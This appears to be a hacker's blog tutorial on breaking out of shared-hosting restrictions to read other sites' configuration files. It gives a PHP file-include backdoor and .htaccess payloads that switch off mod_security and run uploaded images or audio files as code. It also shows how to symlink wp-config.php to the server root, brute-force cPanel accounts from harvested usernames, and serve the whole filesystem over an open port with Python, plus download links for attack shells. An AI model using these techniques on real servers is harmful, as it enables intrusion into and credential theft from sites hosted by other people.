Skip to main content

|Bypass Symlink on 2013 Server With Different .htaccess and Methods by Sen Haxor |

Hi, Guys, 

Please a wonderfull tutorial provided bt Sem;\

 Today I gonna Explain how to bypass Symlink on 2013 Server With Different .htaccess and Methods.

So let's Get Started :)

Note: This method is not applicable for Godaddy, Bluehost, Hostgator and Hostmonstor Servers.

For This First You Need the Following Files :

1 -> Sen Haxor CGI Shell

2 -> sen.zip

3 -> passwd-bypass.php

4 -> Turbo Brute force Cpanel

5 - > Port.py

First Before Starting to symlink we need to create php.ini and ini.php to Disable Safe mode and Disabled Functions on the server .

Use the Following Code :

Make a php.ini with the following code

safe_mode=Off

And ini.php with

<?

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include($_GET["file"]);

ini_restore("safe_mode");

ini_restore("open_basedir");

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include($_GET["ss"]);

?>

I will post the Download link of the files i use on the end of the tutorial .

So after creating php.ini and ini.php upload the other files to the server .

BYPASSING SYMLINK ON PLESK , DEBIAN , CENTOS & REDHAT SERVERS

Now i will explain how to bypass symlink on Plesk , Debian , Centos and Redhat

Commonly all of the above have root path like

/root/var/www/vhost/

where all sites will be under vhost directory  . But you wont have permission to view it so we will create a symbolic link to root and view the site and symlink the config files

Make a new directory in your shell example sen then upload sen.zip . Then use this command to unzip the file and create a symbolic link to root .

Command : unzip sen.zip

Note : In some servers unzip command wont work so you can manually create a symlink to root by using the command ln -s / root

Then You will see this

$ unzip sen.zip

Archive:  sen.zip

    linking: sen.txt                 -> /

finishing deferred symbolic links:

  sen.txt                -> /

This means a symbolic link has been created to / root .



http://foto.pk/images/2rkr.jpg



Now we need to upload .htaccess use the following

Options all

DirectoryIndex Sux.html

AddType text/plain .php

AddHandler server-parsed .php

Done Bypassed Now View /var/www/vhost/ and you will be displayed with all sites .



http://foto.pk/images/3twt.jpg



BYPASSING SYMLINK ON APACHE AND LITESPEED

Mostly when you try to symlink apache in 2013 server you will face 403 forbidden or 404 not found and 500 Internel Server Error

These can be Bypass By Using Different .htaccess individually.

BYPASSING SYMLINK ON APACHE & LITESPEED - Linux Servers .

First for this make a new directory in your shell example sen then upload sen.sa and .htaccess from the Sen Haxor CGI shell which i added the download link at the end of the Tutorial

After uploading .htaccess and sen.sa to a new directory sen chmod sen.sa to 0755

Then Open the Cgi Shell Login ( Password : senhaxor)

Now there are several methods to bypass 403 forbidden You need to try all the following methods . Atleast one will give you success .

Method 1 : .shtml method

This is the commonly used method by most of the hackers to bypass 403 forbidden Error .

So before we procced first you need to get all /etc/passwd from the server so that we can find the username and path of where the sites are located .

2013 Server mostly Many functions are enabled which shows 403 forbidden when you try to read cat /etc/passwd from the server

so i made a Powerfull Shell which can bypass and get /etc/passwd from the server.

I will also add it to the Downloads.

Upload the /etc/passwd bypasser shell and get all /etc/passwd

Then Login to Sen Haxor CGI Shell and create a symbolic link to your Target

Step 1 : ln -s / root

Step 2 : ln -s /home/username/public_html/config.php 1.shtml

Example if our site is www.site.com and username is site and its Wordpress

ln -s /home/site/public_html/wp-config.php 1.shtml

So we created a Symbolic link to our Target now you need to Go to Your Shell and Edit the .htaccess with the following Code :

Options +FollowSymlinks

DirectoryIndex itti.html

RemoveHandler .php

AddType application/octet-stream .php

Once you done this Open the 1.shtml on your Browser and rightclick and view source . You will be able to View the Config .

This is the common way of Bypass 403 forbidden and Litespeed .

Now Let Me Explain You the Advanced Method =)

Method 2 : Bypassing Symlinked Config From Cpanel

For This You need atleast One Cpanel Access on the sever . I will tell you how to easily crack Cpanel .

First Run This Command : ls /var/mail

Then you will be displayed with all username from the server Copy all .

Now Upload Turbo Brute Force Cpanel Script ( i will attach it will the downloads).

Open the Script and in User Paste all the username we got .

And for Password here is the wordlist :



http://pastebin.com/4kAjMvdy



Copy All and Paste it on Password Select Simple and Click Submit

If You're lucky you will be displayed with cracked cpanels.

Once you got a cpanel on the server You can Bypass 500 Internal Server Error 403 Forbidden Error From Port: 2077 and From error-pages from file manager.

Just symlink the config

ln -s /home/user/public_html/wp-config.php config.shtml

Login to the Cpanel

Then Go to File Manager -> Error Pages

Then choose any of these according to what error is triggered when you open your symlinked config

  400 (Bad request)

    401 (Authorization required)

    403 (Forbidden)

    404 (Not found)

    500 (Internal server error)

Example "&file=400.shtml&desc=(Bad request)

we can get the config by

"&file=config.shtml& desc=(Bad request)

BYPASS SYMLINK FROM PORT 2077

So once you Symlinked the Config You can just log in to port 2077

Then public_html/path/config.shtml

You will be able to download the config.shtml and you can view the source.

Method 3: Symlink Bypass via Open Port using Python

For this  First we Python to be Installed on Server.

To check if Python is installed run this command python -h

If its install we can use the following python script and Bypass

#!/usr/bin/env python

# devilzc0de.org (c) 2012

import SimpleHTTPServer

import SocketServer

import os

port = 13123

if __name__=='__main__':

os.chdir('/')

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer(("", port), Handler)

print("Now open this server on webbrowser at port : " + str(port))

print("example: http://site.com :" + str(port))

httpd.serve_forever()

I have added the script to download. 

Now Upload the script to the shell



http://foto.pk/images/205cjg3.jpg



now run this command: python port.py



http://foto.pk/images/2je1wqq.jpg



Now Open the site with port 13123

www.site.com:13123



http://foto.pk/images/j5ifwm.jpg

Server Bypassed From Open Port.

Method 4 : Bypassing Symlink Using .ini Method

Login to Sen Haxor CGI shell normally create a symlink to your target in .ini Extension.

ln -s /home/user/public_html/wp-config.php config.ini

now go to the shell and make a new file a.shtml

Paste the following code inside it and save it

<!--#include virtual="config.ini"-->

and save it.

Now open the a.shtml in the browser and right-click and view the source. Done Bypassed

Method 5: Bypassing Symlink Using ReadMe file

Make a new directory in your shell From the Cgi shell normally symlink the config

ln -s /home/user/public_html/config.php config.txt

now make .htaccess with the following code.

.htaccess

Options All

ReadMeName config.txt

Now when you open the directory on the browser you will be displayed with the config source directly.

eg: site.com/sen/config.txt is your symlinked config then when you open

www.site.com/sen/ you symlinked config will be displayed as a ReadMe content.

 That's it I have explain All the Methods to Bypass Symlink If you will have problem Bypassing Try all the Following .htaccess

1 - > .htaccess

Options Indexes FollowSymLinks

DirectoryIndex ssssss.htm

AddType txt .php

AddHandler txt .php

2 -> .htaccess

Options All

DirectoryIndex ssss.html

addType txt .php

AddHandler txt .php

<IfModule mod_security.c>

SecFilterEngine Off

SecFilterScanPOST Off

</IfModule>

3 -> .htaccess

suPHP_ConfigPath /home/user/public_html/php.ini

4 -> .htaccess

Options +FollowSymLinks

DirectoryIndex Sux.html

Options +Indexes

AddType text/plain .php

AddHandler server-parsed .php

AddType text/plain .html

5 -> .htaccess

Options Indexes FollowSymLinks

DirectoryIndex ssssss.htm

AddType txt .php

AddHandler txt .php

<IfModule mod_autoindex.c>

IndexOptions

FancyIndexing

IconsAreLinks

SuppressHTMLPreamble

</ ifModule>

<IfModule mod_security.c>

SecFilterEngine Off

SecFilterScanPOST Off

</IfModule>



.HTACCESS TO BYPASS DISABLED FUNCTIONS
This one is to make python work :
.htaccess
AddType
application/x-httpd-cgi .py
AddHandler cgi-script .py
AddHandler cgi-script .py
This one is to make perl work :

.htaccess
AddType application/x-httpd-cgi .pl
AddHandler cgi-script .pl
AddHandler cgi-script .pl
This one is to enable Symlink if the function is disabled in the server :

.htaccess

<Directory "/home"> *** Options -ExecCGI* ***

AllowOverride

AuthConfig Indexes

Limit FileInfo

Options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks

</ Directory>

This one is to retrieve users permissions :
.htaccess
AddType text/plain .php
Options +Indexes
DirectoryIndex filename.html
Bypass Internal Server error :
.htaccess
<IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>
Change php version:
.htaccess
AddType application/x-httpd-php4 .php
Bypass Uploads Options and upload shell in another extension :
<FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>
Retrieve Config with picture method :
.htaccess
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .gif
AddHandler cgi-script .gif
AddHandler cgi-script .gif
DOWNLOAD LINK OF THE SCRIPTS I HAVE USED ON THE TUTORIAL :
www.mediafire.com/download/08oeos9cpaloeum/Bypass_Symlink_on_2013_Server_With_Different_.htaccess_and_Methods_by_Sen_Haxor.rar
So thats it i think i had covered everything thats related to Bypass Symlink and Disabled Functions on Server . If you still face Problem in Symlink Contact me :
www.facebook.com/cheenu.vis

Greetz : Lucky - Ashell - Ethicalnoob - Striker - Zagar Yasir - CyberAce Legion - Yash bro - Godzilla -  Architkp - RooT_Devil -Navneeth Singh - Cyberboy India- Cooltoad_ICA - Suriya Prakash - Avinash Mohiti - Ion -Shorty420 - Suriya Subash - Darkw0lf - Manoj Nath -Sksking Decoder - Rafay Bolach  -Mike Wals - Team Indishell and all Indian Hackers


Regards
Sen HaXoR - Team Indishell


Comments

Popular posts from this blog

10 Best Forum Software For Webmasters

10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h...

How to Hack WhatsApp using just a GIF

A picture is worth a thousand words, but a GIF is worth a thousand pictures. Today, the short looping clips, GIFs are everywhere—on your social media, on your message boards, on your chats, helping users perfectly express their emotions, making people laugh, and reliving a highlight. But what if an innocent-looking GIF greeting with Good morning, Happy Birthday, or Merry Christmas message hacks your smartphone? Well, not a theoretical idea anymore. WhatsApp has recently patched a critical security vulnerability in its app for Android, which remained unpatched for at least 3 months after being discovered, and if exploited, could have allowed remote hackers to compromise Android devices and potentially steal files and chat messages. WhatsApp Remote Code Execution Vulnerability The vulnerability, tracked as  CVE-2019-11932 , is a double-free memory corruption bug that doesn't actually reside in the WhatsApp code itself, but in an open-source GIF image parsing library that What...